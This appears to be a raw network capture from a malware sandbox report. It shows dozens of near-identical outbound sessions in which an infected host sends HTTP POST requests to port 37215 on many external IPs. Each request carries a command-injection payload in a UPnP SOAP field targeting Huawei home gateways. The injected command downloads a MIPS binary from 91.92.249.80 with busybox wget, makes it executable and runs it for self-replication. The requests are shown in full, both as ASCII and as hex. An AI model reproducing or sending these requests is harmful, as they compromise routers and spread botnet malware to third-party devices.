                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          667192.168.2.2351714197.218.29.11937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215792894 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          668192.168.2.234749848.147.124.9737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215801001 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          669192.168.2.2336990197.2.147.5637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215805054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          670192.168.2.233597241.11.36.037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215815067 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          671192.168.2.2355180150.255.222.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215928078 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          672192.168.2.2343442197.133.67.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215929985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          673192.168.2.234217666.34.101.10637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215939045 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          674192.168.2.233978241.232.82.3837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215955019 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          675192.168.2.2355400157.197.184.16337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215965033 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          676192.168.2.233721041.226.10.12637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215976954 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          677192.168.2.234492841.186.27.7337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.215986013 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
